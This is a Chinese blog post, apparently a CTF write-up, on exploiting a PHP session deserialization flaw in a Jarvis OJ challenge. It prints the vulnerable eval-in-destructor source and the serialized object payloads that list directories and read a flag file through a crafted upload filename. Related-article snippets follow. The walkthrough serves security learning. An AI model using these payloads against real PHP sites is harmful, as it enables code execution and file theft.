php session漏洞,PHP session反序列化漏洞

最新推荐文章于 2022-10-25 22:11:46 发布
最新推荐文章于 2022-10-25 22:11:46 发布
阅读量254 收藏
点赞数
文章标签: php session漏洞

本文实现以下题目:

http://web.jarvisoj.com:32784/

解题思路:

1.session.upload_progress.enabled=On

解题过程如下:

1.打开地址,获取如下源代码

//A webshell is wait for you

ini_set('session.serialize_handler', 'php');

session_start();

class

OowoO

{

public

$mdzz;

function

__construct()

{

$this->mdzz = 'phpinfo();';

}

function

__destruct()

{

eval(

$this->mdzz);

}

}

if(isset(

$_GET['phpinfo']))

{

$m = new OowoO();

}

else

{

highlight_string(file_get_contents('index.php'));

}

?>

直接运行如下地址:

http://web.jarvisoj.com:32784/?phpinfo,查看PHPinfo页面,发现php.ini中默认session.serialize_handler为php_serialize,而index.php中将其设置为php。这就导致了seesion的反序列化问题。

821f9977aaf7

2.利用session.upload_progress.enabled构造session

首先构造上传表单:

test XXE

反序列化代码如下:

classOowoO

{

public$mdzz='print_r(scandir(dirname(__FILE__)));';

}

$obj =newOowoO();

$a = serialize($obj);

var_dump($a);

执行获得序列化值:

O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}

抓包拦截,将文件名修改如下:

821f9977aaf7

可看到服务器端返回相关flag相关文件名为:Here_1s_7he_fl4g_buT_You_Cannot_see.php

获取文件路径:

821f9977aaf7

/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php

运用如下代码构造序列化值,读取flag:

class OowoO

{

public $mdzz='print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));';

}

$obj = new OowoO();

$a = serialize($obj);

var_dump($a);

序列化结果为:

O:5:"OowoO":1:{s:4:"mdzz";s:88:"print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));";}

重放数据包,获得flag:

821f9977aaf7

参考:https://blog.csdn.net/wy_97/article/details/78430690

刘亚迪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP session反序列化漏洞
weixin_39664643的博客
03-14 5440
PHP session反序列化漏洞 PHP session反序列化漏洞,就是当【序列化存储Session数据】与【反序列化读取Session数据】的方式不同导致session反序列化漏洞的产生 什么是session 官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。主要有以下特点: session保存的位置是在服务器端 session通常是要配合cookie使用 因为HTTP的无状态性,服务端产生了session来标识当前
php Session反序列化漏洞
lonmar的博客
10-27 546
PHP Session 序列化及反序列化处理器 PHP 内置了多种处理器用于存取 $_SESSION 数据时会对数据进行序列化和反序列化,常用的有以下三种,对应三种不同的处理格式: 有关session的配置 session.save_path="" --设置session的存储路径 session.save_handler=""--设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen--指定会话模块是否在请求开始时
PHPsession反序列化漏洞
BerL1n
01-27 646
111
php session反序列化漏洞详解
最新发布
qq_39511050的博客
10-25 849
php session反序列化漏洞详解
PHP常见漏洞的防范措施
大鹏
12-18 2016
一、常见PHP网站安全漏洞 对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。 1、session文件漏洞 Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用
php 命令执行中 PHPSESSID 妙用
y0un9er
10-02 8116
之前刷CTF的时候,遇到一个命令执行的题,看大佬的WP是通过PHPSESSID传值,绕过waf,最近有时间复现了一下。
深入浅析PHPsession反序列化漏洞问题
10-19
主要介绍了PHPsession反序列化漏洞问题,需要的朋友可以参考下
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
PHP反序列化漏洞.pdf
08-10
**PHP反序列化漏洞详解** PHP反序列化漏洞是一种常见的安全漏洞,主要出现在PHP应用程序中,当程序在处理用户可控的序列化数据时,没有进行有效的验证和过滤,导致攻击者能够操纵序列化的数据,从而执行任意代码...
php session 会话固定漏洞
02-27
本书详细阐述了php中的session会话固定漏洞可能引发的安全问题,叙述了php代码审计的一些tips。
phpsession简单分析
yink12138的博客
01-05 1173
phpsession的原理
php session验证码,PHP开发验证码之使用session存储验证信息
weixin_36105296的博客
03-10 492
session_start();$image=imagecreatetruecolor(100,30);$bgcolor=imagecolorallocate($image,255,255,255);//#FFFFFFFFFFFFimagefill($image,0,0,$bgcolor);$captch_code="";for($i=0;$i<4;$i++){$fontsize...
phpsession详解
pakchoily的博客
01-04 3045
基本概念 由于http是无状态协议,所有每个会话必须用session来区分身份。phpsession是被动GC来回收的,之后具体解释。 服务器里的session 在服务器中,session存在tmp中,以file类型存储。tmp的具体位置,在php.ini,中搜索:session.save_path,没被注释的就是真实地址,如下: 在tmp里的样子 这个sess_6cb1pj3n6tnr6t3oqiv8dhptnc,就是存在服务器中的session文件,每个会话对应一个,文件里面包含了session
php session 反序列化,PHP session反序列化
weixin_42109639的博客
03-18 226
PHP session可以看做是一个特殊的变量,且该变量是用于存储关于用户会话的信息,或者更改用户会话的设置,需要注意的是,PHP Session变量存储单一用户的信息,并且对于应用程序中的所有页面都是可用的,且其对应的具体session值会存储于服务器端,这也是与cookie的主要区别,所以seesion的安全性相对较高。PHP session的工作流程当开始一个会话时,PHP会尝试从请求中查找...
PHP漏洞全解(七)-Session劫持
zacklin的专栏
04-16 1525
服务端和客户端之间是通过session(会话)来连接沟通。当客户端的浏览器连接到服务器后,服务器就会建立一个该用户的session。每个用户的session都是独立的,并且由服务器来维护。每个用户的session是由一个独特的字符串来识别,成为session id。用户发出请求时,所发送的http表头内包含session id 的值。服务器使用http表头内的session id来识别时哪个用户提
PHP所有版本 SESSION 漏洞
Alex的专栏
08-28 1378
关键字:php 漏洞 session register_globals 登录 安全先看这一段简单的代码session_start();$_SESSION[isadmin]=yes;$isadmin=no;echo $_SESSION[isadmin];?>当php.ini里配置 register_globals = Off 时,没任何问题,输出 yes但是当php.ini里配置 r
php漏洞版本,PHP所有版本 SESSION 漏洞
weixin_33634341的博客
03-24 382
关键字:php 漏洞 session register_globals 登录 安全 先看这一段简单的代码 当php.ini里配置 register_globals = Off 时, 没任何问题, 输出 yes 但是 当php.ini里配置 register_globals = On 的时候, 第一次运行输出 yes 而刷新一下,则显示的是 no 显然这是不正常的, 这是个很奇怪的问题, 如...
PHP session反序列化漏洞原理解析
Askshhbs的博客
04-25 411
网络安全,web,Kali,渗透测试相关课件,工具,资料 可以关注公众号:“掌控安全课堂” 回复:“我想学黑客”即可免费获得 PHPsession反序列化漏洞,是当序列化存储Session数据与反序列化读取Session数据的方式不同时产生的。 总结学习,能力有限,如有错误请大佬指出。 什么是session 官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session对象存储特定用户会话所需的属性及配置信息。主要有以下特点: session保存的位置是在服务器
深入解析PHP反序列化漏洞
"理解PHP反序列化漏洞-berTrAM在漏洞银行大咖面对面的讲解" 在信息安全领域,PHP反序列化漏洞是一种常见的安全问题,它源于PHP的序列化和反序列化机制。首先,我们需要理解PHP中的类和对象的概念。类是编程中的一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值